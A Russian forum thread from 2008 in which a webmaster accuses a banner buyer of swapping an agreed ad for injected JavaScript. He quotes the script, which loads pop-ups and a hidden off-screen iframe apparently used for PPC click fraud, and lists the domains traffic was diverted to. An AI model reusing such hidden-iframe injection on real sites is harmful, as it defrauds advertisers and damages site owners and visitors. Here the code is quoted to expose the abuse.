На страницу Пред. 1, 2, 3 След. |
|
Ср Июн 04, 2008 3:31 pm |
Start Post: Linoge ICQ 230-267-138 |
bigkromka Свой |
|
Обратиться по нику
|
bigkromka |
Ответить с цитатой | | |
|
Итак все по порядку в деталях, не поленитесь прочитать, интересно.
Стукнулся ко мне Linoge и говорит, давай я баннерное место на твоих сиджах куплю, АФФ баннер повешу. Я думаю почему бы и не продать, вроде чел нормальный, да и копеечка не помешает.
Договорились о цене и размере 700 на 150. Я попросил баннер не менять, доверился челу, позволил через яваскрипт подгружать, типо для учета статистики.
Захожу через время на свой сидж, сморю, а баннер другой и в 2 раза большего размера, стукнул Linoge, так тот еще меня обвинять начал в том, что над его баннером мой висит, который там висел и до того, как мы договорились.
Но в итоге разобрались, баннер сменил.
Начал у меня самый крупный сидж падать (остальные не смотрел, тоже самое думаю), прода просела, ну думаю наверное траф просел и еще что-то. А он падает и падает, короче выяснилось, что это скрипт Linoge его грузит. Стукаю, говорю так и так, он мне в ответ: скрипт смени, я всем сказал об этом, ну я сменил, в конце концов есть договоренность и надо показывать его баннер.
А дальше начинается самое интересное:
Дата центр в котором находиться мой сервак, обновил днс, а мой провайдер стормозил, ну немогу попасть на сидж, взял америкосовский впн, захожу на сидж и чуть со стула не упал: 3 попапа и херня какая-то грузиться все время.
Итог: сидж слетел на 25К, слава богу меня не побанили трейдеры.
доказательства тут
http://www.cjlog.com/search.html?q=newsexworld.com&is_movies=Al…;niche=All
смотреть Java-Scripts, Iframes
document.write("<div id='tizbanner'>"); document.write("<iframe src='http://promo.cams.com/promo/camgirlsliveiframe.jsp?pid=g865402-pct&no_click=1&
;num=7&size=s' scrolling='no' align='middle' width='640' height='175' frameborder='no'></iframe>"); document.write("</div>"); docu
ment.write("<script src='http://www.linbanners.net/banners/show/showbanner9577274.php' type='text/javascript'></script>");
function showbanner(text) {content=document.getelementbyid("tizbanner").innerhtml;content+=text;document.g
etelementbyid("tizbanner").innerhtml=content;}showbanner("<div style='position: absolute; left:-100%; top:0%; width:100%; height:100%;'><iframe style='width:100%;height:100%' width='100%' scrolling='no' frameborder='no' marginwidth='0' marginheight='0' src='http://dabestdomain.info/in.cgi?8¶meter=bigk'></iframe></div>&
quot;);
стукнул Linoge, он ничего не отрицает, ему кажется, что так можно и нужно делать...
ИМХО эта херня делает фейковые клики на PPC, так что, если этот пост читают представители PPC, очень рекомендую проверить траффик акка Linoge, и принять соответсвующие меры, если я прав.
Выводы делайте сами...
та же тема на мастере
http://www.master-x.com/forum/topics/103915/ |
|
|
|
|
|
|
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
Цитата: |
Гермес, вы очень возбуждены и озлоблены, в глазки я вам не ссу, чтобы ссать вам в глазки даже если у вас рост скажем 180, то значит, что у меня рост должен быть под 4 метра, что совсем нереально.
|
Я не озлоблен, я просто ненавижу таких как ты - тех кто не может созидать, а пытается скрысить кусочек чужого. И по хуй на людей. Что они сидят и растят эти сиджи, ночей не спят, работают. |
|
|
|
|
|
3а нас наука. Анархия, батенька, не игрушка...
-Почему у тебя синяк под глазом? -А пусть не лезут. |
Linoge Banned |
|
Обратиться по нику
|
Linoge |
Ответить с цитатой | | |
|
Ну видишь ты сам себе противоречишь, как можно ненавидеть человека и быть на него не озлобленным? Никак, если нинавидишь, то надо не просто ненавидеть, а всей душой, всеми негативными эмоциями пытаться его проклянуть и втоптать в грязь. |
|
|
|
|
|
|
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
У тебя по теме есть еще, что сказать? Или хочешь разобрать мои чувства? |
|
|
|
|
|
Linoge Banned |
|
Обратиться по нику
|
Linoge |
Ответить с цитатой | | |
|
Да вроде нечего по теме, больше никто ничего не спрашивает, видимо информации хватило от обеих сторон и все делают/сделали выводы какие-то для себя.
Нууу, если ты хочешь поговорить о своих чувствах, то можно, я не против, только давай тогда в аське (она есть в названии топика), может ты выскажешься и тебе легче станет, я тоже порою оч зол, а потом поговоришь с кем-то и успокаиваешься... |
|
|
|
|
|
|
Вацлав Сетевой Гугляка |
|
Обратиться по нику
|
Вацлав |
Ответить с цитатой | | |
|
По теме спрашиваю еще раз. Почему вместо условленного баннера АФФ крутилось что-то другое? |
|
|
|
|
|
Второе пришествие Вацлава. Камингсуново. |
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
Я сделаю лучше...
Так как факт крысятничества доказан - ты не предупреждал о том что с баннером АФФ будешь ставить что-то в чем сам и признался:
Linoge (11:06:59 4/06/2008)
04/06/2008 (06:10 GMT +02:00)
привет! экспов там нет как я и говорил и ничего, что гасит проду или сидж, я открываю некоторые сайты под накрутку некоторых систем, скажем так, но сиджи от этого не страдают
|
И так как ты не имеешь объяснения на этот счет, вердикт - бан. |
|
|
|
|
|
tribe Профессионал |
|
Обратиться по нику
|
|
|
|
Вацлав Сетевой Гугляка |
|
Обратиться по нику
|
Вацлав |
Ответить с цитатой | | |
|
Бан, не бан, но если рассуждать четко, то ситуация может разруливаться так:
Linoge не предупредив изменил условия договоренности. Значит и ТС имеет право изменить эти условия "постфактум" и сказать, что стоимость размещения баннера неожиданно выросла до, скажем 5К$. И надо платить - все честно. Один изменил условия сделки без уведомления, значит и второй может. Баннер крутился? Крутился. Измененный? Измененный. Значит и цена другая. |
|
|
|
|
|
Второе пришествие Вацлава. Камингсуново. |
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
По теме спрашиваю еще раз. Почему вместо условленного баннера АФФ крутилось что-то другое?
|
Вацлав, я тебе там ответил на твой вопрос. Откручивал что-то и не предупреждал. |
|
Последний раз редактировалось: Germes (Ср Июн 04, 2008 7:26 pm), всего редактировалось 2 раз(а) |
|
|
|
|
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
Бан, не бан, но если рассуждать четко, то ситуация может разруливаться так:
Linoge не предупредив изменил условия договоренности. Значит и ТС имеет право изменить эти условия "постфактум" и сказать, что стоимость размещения баннера неожиданно выросла до, скажем 5К$. И надо платить - все честно. Один изменил условия сделки без уведомления, значит и второй может. Баннер крутился? Крутился. Измененный? Измененный. Значит и цена другая.
|
Вацлав, тут не в том дело. Тут дело в другом, что некоторые считают возможным губить людям их работу. И теперь говорить, что это не он, когда есть 3 мнения уже на мастере поэтому поводу, и если учесть что он всем наврал про баннер, хотя заранее знал, что будет с ним еще подгружать, то тут все ясно. |
|
|
|
|
|
bigkromka Свой |
|
Обратиться по нику
|
bigkromka |
Ответить с цитатой | | |
|
Спасибо огромное всем, кто поддержал меня. Спасибо, что не остались равнодушными. |
|
|
|
|
|
|
bigkromka Свой |
|
Обратиться по нику
|
bigkromka |
Ответить с цитатой | | |
|
Думаю еще рано ставить точку...
Траффик был слит на накрутку PPC и это не секрет.
Наверняка, это известные партнерские программы.
И судя по всему не мало трафа слито и не только моего.
удалось выцепить куда сливается траф
floorsstreets.net/pls2.php
ladiesroom82.net/well.php
ladiesroom82.net/comeon.php
youllordersomething.com/pls.php
lacostesearchltd.net/imtds.php
lacostesearchltd.net/klick2.php
yx0banners.com/banners/banmanageeu.php
linbanners.net/banners/banmanagelin-04.php
только неизвестно что за фид-провайдеры
Очень хотелось бы выслушать мнения представителей PPC на которых сливался траф и будут ли приняты ли какие то меры относительно г-на Linoge.
Прошу администрацию форума и всех кто может помочь посодействовать в этом вопросе. |
|
|
|
|
|
|
infest + Профессионал |
|
Обратиться по нику
|
|
|
Продаю афлубин и не парюсь |
Germes V.I.P. |
|
Обратиться по нику
|
Germes |
Ответить с цитатой | | |
|
yx0banners.com
хм
|
На это все обратили внимание, но я думаю, что он (ух0) тут не причем. Скорее игра на доверии. |
|
|
|
|
|
DIe$el + + Опытный |
|
Обратиться по нику
|
DIe$el + + |
Ответить с цитатой | | |
|
да вобще то хз его, мне кажется не игра а партнерство
имхо, оба в курсе были че творят |
|
|